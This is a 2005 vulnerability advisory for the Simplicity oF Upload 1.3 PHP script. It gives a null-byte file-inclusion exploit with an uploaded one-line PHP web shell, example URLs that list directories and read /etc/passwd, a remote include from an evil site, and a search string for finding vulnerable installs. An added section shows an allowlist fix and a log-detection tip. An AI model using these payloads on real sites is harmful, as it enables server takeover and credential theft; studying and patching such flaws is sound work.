26/07/2005 16.09.18

Simplicity OF Upload 1.3 (possibly prior versions) remote code execution
& cross site scripting

software:
author site: http://www.phpsimplicity.com/scripts.php?id=3


remote commands execution:

problem at lines 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
   $language = strtolower($_GET['language']);

//now we include the language file
require_once("$language.lng");
...

you can include whatever you want by adding a null byte to the "language" parameter value:

example:
http://localhost:30/simply/download.php?language=upload.php%00

you will see upload & download page together :)

so you can upload a cmd.gif file (when you upload a .php file, usually it is
renamed to .html...) with this php code inside to execute
commands:

<?php

system($HTTP_GET_VARS[command]);

?>

then try this url:

http://[target]/[path]/download.php?language=cmd.gif%00&command=ls

to list directories

http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd

to show /etc/passwd file
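For reference, the include pattern the advisory describes next to a hardened version, as an added example (not Simplicity of Upload's code, not rgod's). The language directory and the list of language codes are assumptions.

```php
<?php
// Added example: the vulnerable include pattern from the advisory and a
// hardened equivalent. Not the project's code; directory and codes assumed.

// VULNERABLE (the pattern quoted in the advisory): the language name comes
// straight from the query string. PHP before 5.3.4 truncated a path at a
// "%00" null byte when opening the file, so the ".lng" suffix was dropped
// and whatever file the request named was included instead.
function include_language_unsafe(array $get): void
{
    $language = 'english';
    if (isset($get['language'])) {
        $language = strtolower($get['language']);
    }
    require_once "$language.lng";
}

// HARDENED: only a fixed allowlist of language codes is ever turned into a
// filename, so no request-controlled string reaches the include path.
const LANGUAGE_DIR = __DIR__ . '/lang';             // assumed layout
const LANGUAGES = ['english', 'italian', 'german']; // assumed codes

function resolve_language_file(?string $requested): string
{
    $language = 'english'; // default when the parameter is absent or invalid
    if ($requested !== null) {
        $candidate = strtolower($requested);
        // Strict comparison against the allowlist: a value containing a null
        // byte, a path separator or a URL can never equal a list entry, so
        // "upload.php%00", "cmd.gif%00" and "http://..." all fall back to
        // the default instead of being opened.
        if (in_array($candidate, LANGUAGES, true)) {
            $language = $candidate;
        }
    }
    return LANGUAGE_DIR . '/' . $language . '.lng';
}

function include_language_safe(array $get): void
{
    require_once resolve_language_file($get['language'] ?? null);
}
```

On the detection side, a literal `%00` in the `language` query parameter of `download.php` requests is the marker to look for in web server access logs, since no legitimate language code contains a null byte.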

cross site scripting:

also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:

http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00



googledork:

"Powered By: Simplicity oF Upload"


rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
original advisory: http://rgod.altervista.org/simply.html